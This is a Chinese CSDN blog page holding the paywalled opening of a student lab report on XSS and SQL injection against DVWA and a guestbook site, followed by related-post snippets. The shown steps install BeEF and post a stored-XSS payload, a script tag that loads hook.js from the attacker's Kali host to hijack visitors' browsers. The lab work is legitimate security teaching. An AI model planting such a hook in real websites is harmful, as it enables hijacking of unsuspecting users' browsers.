实验三 XSS和SQL注入

已于 2022-11-22 00:05:39 修改
阅读量674 收藏
点赞数 1
文章标签: xss sql 安全
于 2022-11-21 23:57:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62685257/article/details/127974890
版权
本文详述了一个实验过程,涵盖了XSS攻击的实施,包括利用Beef劫持浏览器,以及SQL注入的实战,利用Sqlmap枚举数据库信息。实验涉及DVWA靶场,展示了从发现注入点到获取数据库用户名和密码的步骤。
摘要由CSDN通过智能技术生成

1.实验目的和要求

实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。

系统环境:Kali Linux 2、Windows Server

网络环境:交换网络结构

实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA

2. 实验步骤

XSS部分:利用Beef劫持被攻击者客户端浏览器。

实验环境搭建。

角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)

攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);

被攻击者:访问留言簿网站,浏览器被劫持。

1.利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。

 

2.Kali使用beef生成恶意代码,截图。

使用beef首先要安装beef,    输入命令:apt install beef-xss   ,即可安装。

3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,

<script src="http://Kali的IP地址:3000/hook.js"></script>,截图。

最低0.47元/天 解锁文章
Huang慧慧
关注
深信服防火墙模拟web攻防(sql注入xss等)
Grimm的博客
04-02 2166
前提:A地为靶机,B为攻击机,防火墙布置在A连接外网处 1、在A地和B地的PC上分别安装好xhack工具,深圳的PC为靶机,长沙的PC为攻击机; 检测xhack连通性(靶机映射地址) 2、在A的AF上配置用户和业务的安全防护策略; 新建防DOS攻击策略 新增业务防御策略 配置用户防护策略 开启联动封锁 3、确保B的PC通过映射访问A的PC,然后利用B的PC攻击A的PC,测试策略的有效性,并导出xhack上的报告; 进行sql注入 xss攻击+网站扫描 文件泄露 SAVE病毒引擎检测 封
xsssql注入
Coisini的博客
05-22 970
在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇文档,我希望能让你明白什么是XSS,为什么使用XSS,以及怎样使用XSS.一旦你学会了,你将需要发挥自己的创造力,因为大多数人都修补了简单的XSS漏洞.但是他们所忘记做的是修补比XSS的一个字符串更多的漏洞,并且php中特殊安全机制被用来防御XSS,而取代他们自己的方法.同时我将阐述的不仅仅是XSS,而是所有的web安全. XXXXXX...
SQL注入XSS攻击
neverSaynever_的博客
02-20 1702
攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。这里不仅仅 div 的内容被注入了,而且 input 的 value 属性也被注入, alert 会弹出两次。我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。XSS 攻击是页面被注入了恶意的代码,为了更形象的介绍,我们用发生在小明同学身边的事例来进行说明。
记录一款web漏洞扫描工具,包含sql注入xss攻击等各种漏洞扫描
xujingcheng123的博客
04-13 797
名称:Burpsuite 官网地址:https://portswigger.net/burp/releases
网络渗透实验三XSSSQL注入
liangtaiwei的博客
12-13 645
1.实验目的 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、WindowsServer 网络环境:交换网络结构 实验工具:Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 2.实验内容、原理 XSS部分:利用Beef劫持被攻击者客户端浏览器..
【实验报告】实验三 XSSSQL注入
m0_52108440的博客
12-13 1756
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤: XSS部分:利用Beef劫持被攻击者客户端浏览器。 实验环境搭建。.
网络渗透测试实验三 XSSSQL注入
qq_50798384的博客
12-14 679
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤: XSS部分:利用Beef劫持被攻击者客户端浏览器。 实验环境搭建。 角色
输入域安全测试(SQL 注入XSS 跨站攻击)
Best_307的博客
04-11 482
SQL 注入 SQL 注入:将 SQL 语句添加到输入参数中,传递到服务端解析并执行的一种攻击手法 测试方法 输入域输入特殊的 SQL 语句 利用工具:AppScan、ZAP、Sqlmap XSS 跨站攻击 XSS 跨站攻击:恶意攻击者往 web 页面插入恶意脚本代码,而程序对于用户输入内容未过滤,当用户浏览该页面时,嵌入其中的 web 里面的脚本代码会被执行,从而达到恶意攻击用户的特殊目的。 测试方法:输入域中加入 js 脚本语句 输入域安全测试(在输入域中输入以下代码,测试正确性)
DVWA:SQL;留言簿:XSS
qq_50034496的博客
11-24 467
DVWA:SQL;留言簿:XSS
Pikachu靶场——SQL注入漏洞
来日可期的博客
10-06 2014
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。
xss漏洞1
weixin_50887021的博客
06-10 431
xss漏洞简介xss脚本报警弹窗脚本访问网页脚本cookie脚本不断刷新脚本危害三级目录 简介 XSS最大的特点就是能够注入恶意的HTML/JavaScritp代码到用户浏览的页面上,从而达到劫持用户会话的目的。究其原因,是由于web应用程序对用户的输入过滤不严造成的,当用户浏览带有恶意代码的网页时,就会执行其中的恶意代码。由于HTML代码和客户端JavaScript脚本能够在受害者主机上的浏览器任意执行,这样等同于完全控制了WEB客户端。在这个基础上黑客可以轻易的发起cookie资料窃取,会话劫持,钓鱼
【web应用安全攻防技术】02 SQL注入 & XSS注入
最新发布
m0_57432233的博客
01-31 1981
SQL注入攻击是利用Web应用程序数据层存在的输入验证不完善型安全漏洞实施的一类代码注入攻击技术跨站脚本是一种通常存在于Web应用程序中的安全漏洞,使得攻击者可以将恶意的代码注入到网页中,从而危害其他Web访问者(敏感信息、客户端渗透攻击等)客户端脚本:Javascript,Flash ActionScript等。
XSS学习(原理篇)
琦琦进阶之路博客
02-27 3265
学习XSS之前,我们很有必要知道XSS到底是什么东西。其英文名是(Cross Site Scripting),意思就是跨站脚本攻击,是黑客常用的攻击手段之一,因为与层叠样式表CSS(Cascading Style Sheets)同名,为了避免混淆,故将其命名为XSS。好了,现在知道了它的名字的由来之后,最重要的就是去了解XSS的实现原理。XSS实现原理因为浏览器本身的设计缺陷,浏览器只负责解释执行h
dedecms织梦留言板edit.inc.php注入漏洞修复
09-06 247
dedecms注入漏洞,路径:/plus/guestbook/edit.inc.php。dedecms留言板edit.inc.php注入漏洞修复方法。打开edit.inc.php文件。在这两行中间加入一行以下代码。
前端安全XSS攻击
weixin_30325971的博客
10-29 292
前端安全XSS 转载请注明出处:unclekeith: 前端安全XSS XSS定义 XSS, 即为(Cross Site Scripting), 中文名为跨站脚本, 是发生在目标用户的浏览器层面上的,当渲染DOM树的过程成发生了不在预期内执行的JS代码时,就发生了XSS攻击。 跨站脚本的重点不在‘跨站’上,而在于‘脚本’上。大多数XSS攻击的主要方式是嵌入一段远程或者第三方域上的JS代码。实际...
【白帽子学习笔记】XSSSQL注入
python_LC_nohtyp的博客
11-17 1802
【白帽子学习笔记】XSSSQL注入 yysy姚总布置的实验报告越来越难写了,菜菜的我要写好久,┭┮﹏┭┮ 文章目录【白帽子学习笔记】XSSSQL注入0x01 实验知识点1x01 什么是XSS?1x02 什么是Cookie?1x03 XSS漏洞的分类1x04 SQL注入攻击0x02 XSS部分:Beef1x01 搭建GuestBook网站1x02 AWVS扫描1x03 Kail中使用Beef生成恶意代码1x04 XSS注入漏洞2x01 XSS劫持网站2x02 劫持浏览器指定被劫持网站为学校主
Web安全实验:XSSSQL注入实战
总结来说,这个实验让学生亲手实践了XSSSQL注入攻击的过程,同时也强调了防御策略的重要性。通过这样的实践,学生能更好地理解Web应用的安全风险,并在未来的设计和开发中采取必要的安全措施,防止类似的攻击发生...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值